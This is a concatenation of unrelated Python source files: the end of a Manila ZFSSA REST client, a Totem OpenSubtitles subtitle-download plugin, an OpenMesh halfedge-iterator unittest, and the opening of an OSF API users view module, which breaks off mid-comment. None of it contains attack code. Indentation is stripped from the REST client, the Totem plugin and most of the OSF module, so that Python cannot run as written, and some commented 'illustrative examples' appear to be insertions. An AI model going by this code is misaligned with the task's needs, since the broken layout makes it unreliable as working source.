def logout(self):
"""Logout of an appliance."""
result = None
try:
result = self.delete("/access/v1", base_path="/api")
except RestClientError:
pass
self.headers.clear()
self.do_logout = False
return result
def islogin(self):
"""return if client is login."""
return self.do_logout
@staticmethod
def mkpath(*args, **kwargs):
"""Make a path?query string for making a REST request.
:cmd_params args: The path part.
:cmd_params kwargs: The query part.
"""
buf = six.StringIO()
query = "?"
for arg in args:
buf.write("/")
buf.write(arg)
for k in kwargs:
buf.write(query)
if query == "?":
query = "&"
buf.write(k)
buf.write("=")
buf.write(kwargs[k])
return buf.getvalue()
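    # Illustrative example (not in the original): one positional argument per
    # path segment, keyword arguments for the query part, e.g.
    #     RestClientURL.mkpath("shares", "share-1", limit="10")
    # returns "/shares/share-1?limit=10" (query key order follows dict iteration).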
# pylint: disable=R0912
def request(self, path, request, body=None, **kwargs):
"""Make an HTTP request and return the results.
:param path: Path used with the initialized URL to make a request.
:param request: HTTP request type (GET, POST, PUT, DELETE).
:param body: HTTP body of request.
:key accept: Set HTTP 'Accept' header with this value.
:key base_path: Override the base_path for this request.
:key content: Set HTTP 'Content-Type' header with this value.
"""
out_hdrs = dict.copy(self.headers)
if kwargs.get("accept"):
out_hdrs['accept'] = kwargs.get("accept")
if body:
if isinstance(body, dict):
body = six.text_type(jsonutils.dumps(body))
if body and len(body):
out_hdrs['content-length'] = len(body)
zfssaurl = self._path(path, kwargs.get("base_path"))
req = urlrequest.Request(zfssaurl, body, out_hdrs)
req.get_method = lambda: request
maxreqretries = kwargs.get("maxreqretries", 10)
retry = 0
response = None
log_debug_msg(self, 'Request: %s %s' % (request, zfssaurl))
log_debug_msg(self, 'Out headers: %s' % out_hdrs)
if body and body != '':
log_debug_msg(self, 'Body: %s' % body)
while retry < maxreqretries:
try:
response = urlrequest.urlopen(req, timeout=self.timeout)
except urlerror.HTTPError as err:
if err.code == http_client.NOT_FOUND:
log_debug_msg(self, 'REST Not Found: %s' % err.code)
else:
log_debug_msg(self, ('REST Not Available: %s') % err.code)
if (err.code == http_client.SERVICE_UNAVAILABLE and
retry < maxreqretries):
retry += 1
time.sleep(1)
log_debug_msg(self, ('Server Busy retry request: %s')
% retry)
continue
if ((err.code == http_client.UNAUTHORIZED or
err.code == http_client.INTERNAL_SERVER_ERROR) and
'/access/v1' not in zfssaurl):
try:
log_debug_msg(self, ('Authorizing request: '
'%(zfssaurl)s'
'retry: %(retry)d .')
% {'zfssaurl': zfssaurl,
'retry': retry})
self._authorize()
req.add_header('x-auth-session',
self.headers['x-auth-session'])
except RestClientError:
log_debug_msg(self, ('Cannot authorize.'))
retry += 1
time.sleep(1)
continue
return RestResult(self.log_function, err=err)
except urlerror.URLError as err:
log_debug_msg(self, ('URLError: %s') % err.reason)
raise RestClientError(-1, name="ERR_URLError",
message=err.reason)
break
if ((response and
response.getcode() == http_client.SERVICE_UNAVAILABLE) and
retry >= maxreqretries):
raise RestClientError(response.getcode(), name="ERR_HTTPError",
message="REST Not Available: Disabled")
return RestResult(self.log_function, response=response)
def get(self, path, **kwargs):
"""Make an HTTP GET request.
:param path: Path to resource.
"""
return self.request(path, "GET", **kwargs)
def post(self, path, body="", **kwargs):
"""Make an HTTP POST request.
:param path: Path to resource.
:param body: Post data content.
"""
return self.request(path, "POST", body, **kwargs)
def put(self, path, body="", **kwargs):
"""Make an HTTP PUT request.
:param path: Path to resource.
:param body: Put data content.
"""
return self.request(path, "PUT", body, **kwargs)
def delete(self, path, **kwargs):
"""Make an HTTP DELETE request.
:param path: Path to resource that will be deleted.
"""
return self.request(path, "DELETE", **kwargs)
def head(self, path, **kwargs):
"""Make an HTTP HEAD request.
:param path: Path to resource.
"""
return self.request(path, "HEAD", **kwargs)
| NetApp/manila | manila/share/drivers/zfssa/restclient.py | Python | apache-2.0 | 12,868 |
# -*- coding: utf-8 -*-
import gi
gi.require_version('Peas', '1.0')
gi.require_version('Gtk', '3.0')
gi.require_version('Totem', '1.0')
from gi.repository import GLib, GObject # pylint: disable-msg=E0611
from gi.repository import Peas, Gtk, Gdk # pylint: disable-msg=E0611
from gi.repository import Gio, Pango, Totem # pylint: disable-msg=E0611
import xmlrpc.client
import threading
import zlib
from os import sep, path, mkdir
import gettext
from hash import hash_file
gettext.textdomain ("totem")
D_ = gettext.dgettext
_ = gettext.gettext
USER_AGENT = 'Totem'
OK200 = '200 OK'
TOTEM_REMOTE_COMMAND_REPLACE = 14
SUBTITLES_EXT = [
"asc",
"txt",
"sub",
"srt",
"smi",
"ssa",
"ass",
]
# Map of the language codes used by opensubtitles.org's API to their
# human-readable name
LANGUAGES_STR = [ (D_('iso_639_3', 'Albanian'), 'sq'),
(D_('iso_639_3', 'Arabic'), 'ar'),
(D_('iso_639_3', 'Armenian'), 'hy'),
(D_('iso_639_3', 'Neo-Aramaic, Assyrian'), 'ay'),
(D_('iso_639_3', 'Basque'), 'eu'),
(D_('iso_639_3', 'Bosnian'), 'bs'),
(_('Brazilian Portuguese'), 'pb'),
(D_('iso_639_3', 'Bulgarian'), 'bg'),
(D_('iso_639_3', 'Catalan'), 'ca'),
(D_('iso_639_3', 'Chinese'), 'zh'),
(D_('iso_639_3', 'Croatian'), 'hr'),
(D_('iso_639_3', 'Czech'), 'cs'),
(D_('iso_639_3', 'Danish'), 'da'),
(D_('iso_639_3', 'Dutch'), 'nl'),
(D_('iso_639_3', 'English'), 'en'),
(D_('iso_639_3', 'Esperanto'), 'eo'),
(D_('iso_639_3', 'Estonian'), 'et'),
(D_('iso_639_3', 'Finnish'), 'fi'),
(D_('iso_639_3', 'French'), 'fr'),
(D_('iso_639_3', 'Galician'), 'gl'),
(D_('iso_639_3', 'Georgian'), 'ka'),
(D_('iso_639_3', 'German'), 'de'),
(D_('iso_639_3', 'Greek, Modern (1453-)'), 'el'),
(D_('iso_639_3', 'Hebrew'), 'he'),
(D_('iso_639_3', 'Hindi'), 'hi'),
(D_('iso_639_3', 'Hungarian'), 'hu'),
(D_('iso_639_3', 'Icelandic'), 'is'),
(D_('iso_639_3', 'Indonesian'), 'id'),
(D_('iso_639_3', 'Italian'), 'it'),
(D_('iso_639_3', 'Japanese'), 'ja'),
(D_('iso_639_3', 'Kazakh'), 'kk'),
(D_('iso_639_3', 'Korean'), 'ko'),
(D_('iso_639_3', 'Latvian'), 'lv'),
(D_('iso_639_3', 'Lithuanian'), 'lt'),
(D_('iso_639_3', 'Luxembourgish'), 'lb'),
(D_('iso_639_3', 'Macedonian'), 'mk'),
(D_('iso_639_3', 'Malay (macrolanguage)'), 'ms'),
(D_('iso_639_3', 'Norwegian'), 'no'),
(D_('iso_639_3', 'Occitan (post 1500)'), 'oc'),
(D_('iso_639_3', 'Persian'), 'fa'),
(D_('iso_639_3', 'Polish'), 'pl'),
(D_('iso_639_3', 'Portuguese'), 'pt'),
(D_('iso_639_3', 'Romanian'), 'ro'),
(D_('iso_639_3', 'Russian'), 'ru'),
(D_('iso_639_3', 'Serbian'), 'sr'),
(D_('iso_639_3', 'Slovak'), 'sk'),
(D_('iso_639_3', 'Slovenian'), 'sl'),
(D_('iso_639_3', 'Spanish'), 'es'),
(D_('iso_639_3', 'Swedish'), 'sv'),
(D_('iso_639_3', 'Thai'), 'th'),
(D_('iso_639_3', 'Turkish'), 'tr'),
(D_('iso_639_3', 'Ukrainian'), 'uk'),
(D_('iso_639_3', 'Vietnamese'), 'vi'),]
# Map of ISO 639-1 language codes to the codes used by opensubtitles.org's API
LANGUAGES = {'sq':'alb',
'ar':'ara',
'hy':'arm',
'ay':'ass',
'bs':'bos',
'pb':'pob',
'bg':'bul',
'ca':'cat',
'zh':'chi',
'hr':'hrv',
'cs':'cze',
'da':'dan',
'nl':'dut',
'en':'eng',
'eo':'epo',
'eu':'eus',
'et':'est',
'fi':'fin',
'fr':'fre',
'gl':'glg',
'ka':'geo',
'de':'ger',
'el':'ell',
'he':'heb',
'hi':'hin',
'hu':'hun',
'is':'ice',
'id':'ind',
'it':'ita',
'ja':'jpn',
'kk':'kaz',
'ko':'kor',
'lv':'lav',
'lt':'lit',
'lb':'ltz',
'mk':'mac',
'ms':'may',
'no':'nor',
'oc':'oci',
'fa':'per',
'pl':'pol',
'pt':'por',
'ro':'rum',
'ru':'rus',
'sr':'scc',
'sk':'slo',
'sl':'slv',
'es':'spa',
'sv':'swe',
'th':'tha',
'tr':'tur',
'uk':'ukr',
'vi':'vie',}
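# Illustrative example of the two maps above: a locale such as 'pt_PT' is first
# reduced to the ISO 639-1 code 'pt', which LANGUAGES then maps to the
# opensubtitles.org code 'por'.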
class SearchThread (threading.Thread):
"""
This is the thread started when the dialog is searching for subtitles
"""
def __init__ (self, model, movie_hash, movie_size):
self._model = model
self._movie_hash = movie_hash
self._movie_size = movie_size
self._done = False
self._results = []
self._lock = threading.Lock ()
self._message = ''
threading.Thread.__init__ (self)
def run (self):
self._lock.acquire (True)
(self._results,
self._message) = self._model.search_subtitles (self._movie_hash,
self._movie_size)
self._done = True
self._lock.release ()
def get_results (self):
results = []
self._lock.acquire (True)
if self._done:
results = self._results
self._lock.release ()
return results
def get_message (self):
message = _(u'Searching for subtitles…')
self._lock.acquire (True)
if self._done:
message = self._message
self._lock.release ()
return message
@property
def done (self):
""" Thread-safe property to know whether the query is done or not """
self._lock.acquire (True)
res = self._done
self._lock.release ()
return res
class DownloadThread (threading.Thread):
"""
This is the thread started when the dialog is downloading the subtitles.
"""
def __init__ (self, model, subtitle_id):
self._model = model
self._subtitle_id = subtitle_id
self._done = False
self._lock = threading.Lock ()
self._subtitles = ''
self._message = ''
threading.Thread.__init__ (self)
def run (self):
self._lock.acquire (True)
(self._subtitles,
self._message) = self._model.download_subtitles (self._subtitle_id)
self._done = True
self._lock.release ()
def get_subtitles (self):
subtitles = ''
self._lock.acquire (True)
if self._done:
subtitles = self._subtitles
self._lock.release ()
return subtitles
def get_message (self):
message = _(u'Downloading the subtitles…')
self._lock.acquire (True)
if self._done:
message = self._message
self._lock.release ()
return message
@property
def done (self):
""" Thread-safe property to know whether the query is done or not """
self._lock.acquire (True)
res = self._done
self._lock.release ()
return res
# OpenSubtitles.org API abstraction
class OpenSubtitlesModel (object):
"""
This contains the logic of the opensubtitles service.
"""
def __init__ (self, server):
self._server = server
self._token = None
try:
import locale
(language_code, _) = locale.getlocale ()
self.lang = LANGUAGES[language_code.split ('_')[0]]
except (ImportError, IndexError, AttributeError, KeyError):
self.lang = 'eng'
self._lock = threading.Lock ()
def _log_in (self, username='', password=''):
"""
Non-locked version of log_in() for internal use only.
@rtype : (bool, string)
"""
result = None
if self._token:
# We have already logged-in before, check the connection
try:
result = self._server.NoOperation (self._token)
except (xmlrpc.client.Fault, xmlrpc.client.ProtocolError):
pass
            if result and result['status'] == OK200:
                return (True, '')
try:
result = self._server.LogIn (username, password, self.lang,
USER_AGENT)
except (xmlrpc.client.Fault, xmlrpc.client.ProtocolError):
pass
if result and result.get ('status') == OK200:
self._token = result.get ('token')
if self._token:
return (True, '')
return (False, _(u'Could not contact the OpenSubtitles website'))
def log_in (self, username='', password=''):
"""
        Logs into the opensubtitles web service and gets a valid token for
        the coming communications. If we are already logged in, it only checks
        whether the token is still valid. It returns a tuple of success boolean
and error message (if appropriate).
@rtype : (bool, string)
"""
self._lock.acquire (True)
result = self._log_in (username, password)
self._lock.release ()
return result
def search_subtitles (self, movie_hash, movie_size):
self._lock.acquire (True)
message = ''
(log_in_success, log_in_message) = self._log_in ()
if log_in_success:
searchdata = {'sublanguageid': self.lang,
'moviehash' : movie_hash,
'moviebytesize': str (movie_size)}
            result = None
            try:
                result = self._server.SearchSubtitles (self._token,
                                                       [searchdata])
            except xmlrpc.client.ProtocolError:
                message = _(u'Could not contact the OpenSubtitles website.')
            if result and result.get ('data'):
self._lock.release ()
return (result['data'], message)
else:
message = _(u'No results found.')
else:
message = log_in_message
self._lock.release ()
return (None, message)
def download_subtitles (self, subtitle_id):
self._lock.acquire (True)
message = ''
error_message = _(u'Could not contact the OpenSubtitles website.')
(log_in_success, log_in_message) = self._log_in ()
if log_in_success:
result = None
try:
result = self._server.DownloadSubtitles (self._token,
[subtitle_id])
except xmlrpc.client.ProtocolError:
message = error_message
if result and result.get ('status') == OK200:
try:
subtitle64 = result['data'][0]['data']
except LookupError:
self._lock.release ()
return (None, error_message)
subtitle_unzipped = zlib.decompress(GLib.base64_decode (subtitle64), 47)
self._lock.release ()
return (subtitle_unzipped, message)
else:
message = log_in_message
self._lock.release ()
return (None, message)
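# Illustrative sketch (not part of the plugin) of how the model above is driven;
# the plugin below wires it to the same xmlrpc endpoint in do_activate ():
#
#   server = xmlrpc.client.Server ('http://api.opensubtitles.org/xml-rpc')
#   model = OpenSubtitlesModel (server)
#   (results, message) = model.search_subtitles (movie_hash, movie_size)
#   (data, message) = model.download_subtitles (results[0]['IDSubtitleFile'])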
class OpenSubtitles (GObject.Object, # pylint: disable-msg=R0902
Peas.Activatable):
__gtype_name__ = 'OpenSubtitles'
object = GObject.Property (type = GObject.Object)
def __init__ (self):
GObject.Object.__init__ (self)
self._dialog = None
self._totem = None
schema = 'org.gnome.totem.plugins.opensubtitles'
self._settings = Gio.Settings.new (schema)
self._action = None
self._find_button = None
self._apply_button = None
self._close_button = None
self._list_store = None
self._model = None
self._tree_view = None
self._filename = None
self._progress = None
# totem.Plugin methods
def do_activate (self):
"""
Called when the plugin is activated.
Here the sidebar page is initialized (set up the treeview, connect
the callbacks, ...) and added to totem.
"""
self._totem = self.object
# Name of the movie file which the most-recently-downloaded subtitles
# are related to.
self._filename = None
self._append_menu ()
self._totem.connect ('file-opened', self.__on_totem__file_opened)
self._totem.connect ('file-closed', self.__on_totem__file_closed)
# Obtain the ServerProxy and init the model
server = xmlrpc.client.Server ('http://api.opensubtitles.org/xml-rpc')
self._model = OpenSubtitlesModel (server)
def do_deactivate (self):
if self._dialog:
self._dialog.destroy ()
self._dialog = None
self._delete_menu ()
# UI related code
def _build_dialog (self):
builder = Totem.plugin_load_interface ("opensubtitles",
"opensubtitles.ui", True,
self._totem.get_main_window (),
None)
# Obtain all the widgets we need to initialize
combobox = builder.get_object ('language_combobox')
languages = builder.get_object ('language_model')
self._progress = builder.get_object ('progress_bar')
self._tree_view = builder.get_object ('subtitle_treeview')
self._list_store = builder.get_object ('subtitle_model')
self._dialog = builder.get_object ('subtitles_dialog')
self._find_button = builder.get_object ('find_button')
self._apply_button = builder.get_object ('apply_button')
self._close_button = builder.get_object ('close_button')
# Set up and populate the languages combobox
renderer = Gtk.CellRendererText ()
sorted_languages = Gtk.TreeModelSort (model = languages)
sorted_languages.set_sort_column_id (0, Gtk.SortType.ASCENDING)
combobox.set_model (sorted_languages)
combobox.pack_start (renderer, True)
combobox.add_attribute (renderer, 'text', 0)
lang = self._settings.get_string ('language')
if lang is not None:
self._model.lang = lang
for lang in LANGUAGES_STR:
itera = languages.append (lang)
if LANGUAGES[lang[1]] == self._model.lang:
(success,
parentit) = sorted_languages.convert_child_iter_to_iter (itera)
if success:
combobox.set_active_iter (parentit)
# Set up the results treeview
renderer = Gtk.CellRendererText ()
self._tree_view.set_model (self._list_store)
renderer.set_property ('ellipsize', Pango.EllipsizeMode.END)
column = Gtk.TreeViewColumn (_(u"Subtitles"), renderer, text=0)
column.set_resizable (True)
column.set_expand (True)
self._tree_view.append_column (column)
# translators comment:
# This is the file-type of the subtitle file detected
column = Gtk.TreeViewColumn (_(u"Format"), renderer, text=1)
column.set_resizable (False)
self._tree_view.append_column (column)
# translators comment:
# This is a rating of the quality of the subtitle
column = Gtk.TreeViewColumn (_(u"Rating"), renderer, text=2)
column.set_resizable (False)
self._tree_view.append_column (column)
self._apply_button.set_sensitive (False)
self._apply_button.connect ('clicked', self.__on_apply_clicked)
self._find_button.connect ('clicked', self.__on_find_clicked)
self._close_button.connect ('clicked', self.__on_close_clicked)
# Set up signals
combobox.connect ('changed', self.__on_combobox__changed)
self._dialog.connect ('delete-event', self._dialog.hide_on_delete)
self._dialog.set_transient_for (self._totem.get_main_window ())
self._dialog.set_position (Gtk.WindowPosition.CENTER_ON_PARENT)
# Connect the callbacks
self._dialog.connect ('key-press-event',
self.__on_window__key_press_event)
self._tree_view.get_selection ().connect ('changed',
self.__on_treeview__row_change)
self._tree_view.connect ('row-activated',
self.__on_treeview__row_activate)
def _show_dialog (self, params, _):
if not self._dialog:
self._build_dialog ()
self._dialog.show_all ()
self._progress.set_fraction (0.0)
def _append_menu (self):
self._action = Gio.SimpleAction.new ("opensubtitles", None)
self._action.connect ('activate', self._show_dialog)
self._totem.add_action (self._action)
self._totem.set_accels_for_action ("app.opensubtitles",
["<Primary><Shift>s"])
menu = self._totem.get_menu_section ("subtitle-download-placeholder")
menu.append (_(u'_Download Movie Subtitles…'), "app.opensubtitles")
self._action.set_enabled (self._totem.is_playing () and
self._check_allowed_scheme () and
not self._check_is_audio ())
def _check_allowed_scheme (self):
current_file = Gio.file_new_for_uri (self._totem.get_current_mrl ())
scheme = current_file.get_uri_scheme ()
if (scheme == 'dvd' or scheme == 'http' or
scheme == 'dvb' or scheme == 'vcd'):
return False
return True
def _check_is_audio (self):
# FIXME need to use something else here
        # I think we must use the video widget metadata, but I haven't found a
        # way to get this info from Python
filename = self._totem.get_current_mrl ()
if Gio.content_type_guess (filename, '')[0].split ('/')[0] == 'audio':
return True
return False
def _delete_menu (self):
self._totem.empty_menu_section ("subtitle-download-placeholder")
def _get_results (self, movie_hash, movie_size):
self._list_store.clear ()
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
cursor = Gdk.Cursor.new (Gdk.CursorType.WATCH)
self._dialog.get_window ().set_cursor (cursor)
thread = SearchThread (self._model, movie_hash, movie_size)
thread.start ()
GLib.idle_add (self._populate_treeview, thread)
self._progress.set_text (_(u'Searching subtitles…'))
GLib.timeout_add (350, self._progress_bar_increment, thread)
def _populate_treeview (self, search_thread):
if not search_thread.done:
return True
results = search_thread.get_results ()
if results:
for sub_data in results:
if not SUBTITLES_EXT.count (sub_data['SubFormat']):
continue
self._list_store.append ([sub_data['SubFileName'],
sub_data['SubFormat'],
sub_data['SubRating'],
sub_data['IDSubtitleFile'],])
self._dialog.get_window ().set_cursor (None)
return False
def _save_selected_subtitle (self):
cursor = Gdk.Cursor.new (Gdk.CursorType.WATCH)
self._dialog.get_window ().set_cursor (cursor)
model, rows = self._tree_view.get_selection ().get_selected_rows ()
if rows:
subtitle_iter = model.get_iter (rows[0])
subtitle_id = model.get_value (subtitle_iter, 3)
subtitle_format = model.get_value (subtitle_iter, 1)
bpath = self._cache_subtitles_dir()
directory = Gio.file_new_for_path (bpath)
try:
directory.make_directory_with_parents (None);
except:
pass
thread = DownloadThread (self._model, subtitle_id)
thread.start ()
GLib.idle_add (self._save_subtitles, thread, subtitle_format)
self._progress.set_text (_(u'Downloading the subtitles…'))
GLib.timeout_add (350, self._progress_bar_increment, thread)
else:
#warn user!
pass
def _cache_subtitles_dir (self):
bpath = GLib.get_user_cache_dir() + sep
bpath += 'totem' + sep + 'subtitles' + sep
return bpath
def _movie_dir (self):
directory = Gio.file_new_for_uri (self._filename)
parent = directory.get_parent()
return parent.get_path ()
def _save_subtitles (self, download_thread, extension):
if not download_thread.done:
return True
subtitles = download_thread.get_subtitles ()
suburi = None
if subtitles:
subtitle_file = Gio.file_new_for_uri (self._filename)
movie_name = subtitle_file.get_basename ().rpartition ('.')[0]
            # Delete all previously cached subtitles for this file
for ext in SUBTITLES_EXT:
# In the cache dir
old_subtitle_file = Gio.file_new_for_path (self._cache_subtitles_dir() + sep + movie_name + '.' + ext)
try:
old_subtitle_file.delete (None)
except:
pass
# In the movie dir
old_subtitle_file = Gio.file_new_for_path (self._movie_dir() + sep + movie_name + '.' + ext)
try:
old_subtitle_file.delete (None)
except:
pass
flags = Gio.FileCreateFlags.REPLACE_DESTINATION
try:
subtitle_file = Gio.file_new_for_path (self._movie_dir() + sep + movie_name + '.' + extension)
print ('trying to save to ' + subtitle_file.get_uri())
suburi = subtitle_file.get_uri ()
sub_file = subtitle_file.replace ('', False, flags, None)
sub_file.write (subtitles, None)
sub_file.close (None)
except:
subtitle_file = Gio.file_new_for_path (self._cache_subtitles_dir() + sep + movie_name + '.' + extension)
print ('saving to ' + subtitle_file.get_uri())
suburi = subtitle_file.get_uri ()
sub_file = subtitle_file.replace ('', False, flags, None)
sub_file.write (subtitles, None)
sub_file.close (None)
self._dialog.get_window ().set_cursor (None)
self._close_dialog ()
if suburi:
self._totem.set_current_subtitle (suburi)
return False
def _progress_bar_increment (self, thread):
if not thread.done:
self._progress.pulse ()
return True
message = thread.get_message ()
if message:
self._progress.set_text (message)
else:
self._progress.set_text (' ')
self._progress.set_fraction (0.0)
self._find_button.set_sensitive (True)
self._apply_button.set_sensitive (False)
self._tree_view.set_sensitive (True)
return False
def _download_and_apply (self):
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
self._action.set_enabled (False)
self._tree_view.set_sensitive (False)
self._save_selected_subtitle ()
def _close_dialog (self):
# We hide the dialogue instead of closing it so that we still have the
# last set of search results up if we re-open the dialogue without
# changing the movie
self._dialog.hide ()
# Callbacks
def __on_window__key_press_event (self, _, event):
if event.keyval == Gdk.KEY_Escape:
self._close_dialog ()
return True
return False
def __on_treeview__row_change (self, selection):
if selection.count_selected_rows () > 0:
self._apply_button.set_sensitive (True)
else:
self._apply_button.set_sensitive (False)
def __on_treeview__row_activate (self,
_tree_path, # pylint: disable-msg=W0613
_column, # pylint: disable-msg=W0613
_data): # pylint: disable-msg=W0613
self._download_and_apply ()
def __on_totem__file_opened (self, _, new_mrl):
# Check if allows subtitles
if self._check_allowed_scheme () and not self._check_is_audio ():
self._action.set_enabled (True)
if self._dialog:
self._find_button.set_sensitive (True)
# Check we're not re-opening the same file; if we are, don't
# clear anything. This happens when we re-load the file with a
# new set of subtitles, for example
if self._filename != new_mrl:
self._filename = new_mrl
self._list_store.clear ()
self._apply_button.set_sensitive (False)
else:
self._action.set_enabled (False)
if self._dialog and self._dialog.is_active ():
self._filename = None
self._list_store.clear ()
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
def __on_totem__file_closed (self, _):
self._action.set_enabled (False)
if self._dialog:
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
def __on_combobox__changed (self, combobox):
combo_iter = combobox.get_active_iter ()
combo_model = combobox.get_model ()
self._model.lang = LANGUAGES[combo_model.get_value (combo_iter, 1)]
self._settings.set_string ('language', self._model.lang)
def __on_close_clicked (self, _):
self._close_dialog ()
def __on_apply_clicked (self, _):
self._download_and_apply ()
def __on_find_clicked (self, _):
self._apply_button.set_sensitive (False)
self._find_button.set_sensitive (False)
self._filename = self._totem.get_current_mrl ()
(movie_hash, movie_size) = hash_file (self._filename)
self._get_results (movie_hash, movie_size)
| ndufresne/totem | src/plugins/opensubtitles/opensubtitles.py | Python | gpl-2.0 | 26,489 |
import unittest
import openmesh
class TriMeshCirculatorVertexIHalfEdge(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
# Add some vertices
self.vhandle = []
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0,-1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2,-1, 0)))
# Add four faces
self.mesh.add_face(self.vhandle[0], self.vhandle[1], self.vhandle[2])
self.mesh.add_face(self.vhandle[1], self.vhandle[3], self.vhandle[4])
self.mesh.add_face(self.vhandle[0], self.vhandle[3], self.vhandle[1])
self.mesh.add_face(self.vhandle[2], self.vhandle[1], self.vhandle[4])
'''
Test setup:
0 ==== 2
|\ 0 /|
| \ / |
|2 1 3|
| / \ |
|/ 1 \|
3 ==== 4
Starting halfedge is 1->4
'''
def test_vertex_incoming_halfedge_without_holes_increment(self):
# Iterate around vertex 1 at the middle
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[1])
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 10)
self.assertEqual(self.mesh.face_handle(heh).idx(), 1)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 7)
self.assertEqual(self.mesh.face_handle(heh).idx(), 2)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 0)
self.assertEqual(self.mesh.face_handle(heh).idx(), 0)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 3)
self.assertEqual(self.mesh.face_handle(heh).idx(), 3)
self.assertRaises(StopIteration, vih_it.__next__)
def test_vertex_incoming_halfedge_boundary_increment(self):
# Iterate around vertex 2 at the boundary
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[2])
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 14)
self.assertEqual(self.mesh.face_handle(heh).idx(), 3)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 2)
self.assertEqual(self.mesh.face_handle(heh).idx(), 0)
heh = vih_it.__next__()
self.assertEqual(heh.idx(), 5)
self.assertEqual(self.mesh.face_handle(heh).idx(), -1)
self.assertRaises(StopIteration, vih_it.__next__)
def test_vertex_incoming_halfedge_dereference_increment(self):
# Iterate around vertex 1 at the middle
vih_it = openmesh.VertexIHalfedgeIter(self.mesh, self.vhandle[1])
heh = vih_it.__next__()
eh = self.mesh.edge_handle(heh)
vh = self.mesh.to_vertex_handle(heh)
self.assertEqual(heh.idx(), 10)
self.assertEqual(eh.idx(), 5)
self.assertEqual(vh.idx(), 1)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TriMeshCirculatorVertexIHalfEdge)
unittest.TextTestRunner(verbosity=2).run(suite)
| svn2github/OpenMesh2 | src/Python/Unittests/test_trimesh_circulator_vertex_ihalfedge.py | Python | bsd-3-clause | 3,197 |
import pytz
from django.apps import apps
from django.db.models import F, Q
from api.addons.views import AddonSettingsMixin
from api.base import permissions as base_permissions
from api.base.waffle_decorators import require_flag
from api.base.exceptions import Conflict, UserGone
from api.base.filters import ListFilterMixin, PreprintFilterMixin
from api.base.parsers import (
JSONAPIRelationshipParser,
JSONAPIRelationshipParserForRegularJSON,
JSONAPIMultipleRelationshipsParser,
JSONAPIMultipleRelationshipsParserForRegularJSON,
)
from api.base.serializers import get_meta_type, AddonAccountSerializer
from api.base.utils import (
default_node_list_permission_queryset,
get_object_or_error,
get_user_auth,
hashids,
is_truthy,
)
from api.base.views import JSONAPIBaseView, WaterButlerMixin
from api.base.throttling import SendEmailThrottle, SendEmailDeactivationThrottle
from api.institutions.serializers import InstitutionSerializer
from api.nodes.filters import NodesFilterMixin, UserNodesFilterMixin
from api.nodes.serializers import DraftRegistrationSerializer
from api.nodes.utils import NodeOptimizationMixin
from api.osf_groups.serializers import GroupSerializer
from api.preprints.serializers import PreprintSerializer
from api.registrations.serializers import RegistrationSerializer
from api.users.permissions import (
CurrentUser, ReadOnlyOrCurrentUser,
ReadOnlyOrCurrentUserRelationship,
ClaimUserPermission,
)
from api.users.serializers import (
UserAddonSettingsSerializer,
UserDetailSerializer,
UserIdentitiesSerializer,
UserInstitutionsRelationshipSerializer,
UserSerializer,
UserEmail,
UserEmailsSerializer,
UserNodeSerializer,
UserSettingsSerializer,
UserSettingsUpdateSerializer,
UserQuickFilesSerializer,
UserAccountExportSerializer,
ReadEmailUserDetailSerializer,
UserChangePasswordSerializer,
)
from django.contrib.auth.models import AnonymousUser
from django.http import JsonResponse
from django.utils import timezone
from framework.auth.core import get_user
from framework.auth.views import send_confirm_email
from framework.auth.oauth_scopes import CoreScopes, normalize_scopes
from framework.auth.exceptions import ChangePasswordError
from framework.utils import throttle_period_expired
from framework.sessions.utils import remove_sessions_for_user
from framework.exceptions import PermissionsError, HTTPError
from osf.features import OSF_GROUPS
from rest_framework import permissions as drf_permissions
from rest_framework import generics
from rest_framework import status
from rest_framework.response import Response
from rest_framework.exceptions import NotAuthenticated, NotFound, ValidationError, Throttled
from osf.models import (
Contributor,
DraftRegistration,
ExternalAccount,
Guid,
QuickFilesNode,
AbstractNode,
Preprint,
Node,
Registration,
OSFGroup,
OSFUser,
Email,
)
from osf.utils import permissions
from website import mails, settings
from website.project.views.contributor import send_claim_email, send_claim_registered_email
class UserMixin(object):
"""Mixin with convenience methods for retrieving the current user based on the
current URL. By default, fetches the user based on the user_id kwarg.
"""
serializer_class = UserSerializer
user_lookup_url_kwarg = 'user_id'
def get_user(self, check_permissions=True):
key = self.kwargs[self.user_lookup_url_kwarg]
# If Contributor is in self.request.parents,
# then this view is getting called due to an embedded request (contributor embedding user)
# We prefer to access the user from the contributor object and take advantage
# of the query cache
if hasattr(self.request, 'parents') and len(self.request.parents.get(Contributor, {})) == 1:
# We expect one parent contributor view, so index into the first item
            contrib_id, contrib = list(self.request.parents[Contributor].items())[0]
user = contrib.user
if user.is_disabled:
raise UserGone(user=user)
# Make sure that the contributor ID is correct
if user._id == key:
if check_permissions:
self.check_object_permissions(self.request, user)
return get_object_or_error(
OSFUser.objects.filter(id=user.id).annotate(default_region=F('addons_osfstorage_user_settings__default_region___id')).exclude(default_region=None),
request=self.request,
display_name='user',
)
if self.kwargs.get('is_embedded') is True:
if key in self.request.parents[OSFUser]:
return self.request.parents[OSFUser].get(key)
current_user = self.request.user
if isinstance(current_user, AnonymousUser):
if key == 'me':
raise NotAuthenticated
elif key == 'me' or key == current_user._id:
return get_object_or_error(
OSFUser.objects.filter(id=current_user.id).annotate(default_region=F('addons_osfstorage_user_settings__default_region___id')).exclude(default_region=None),
request=self.request,
display_name='user',
)
obj = get_object_or_error(OSFUser, key, self.request, 'user')
if check_permissions:
# May raise a permission denied
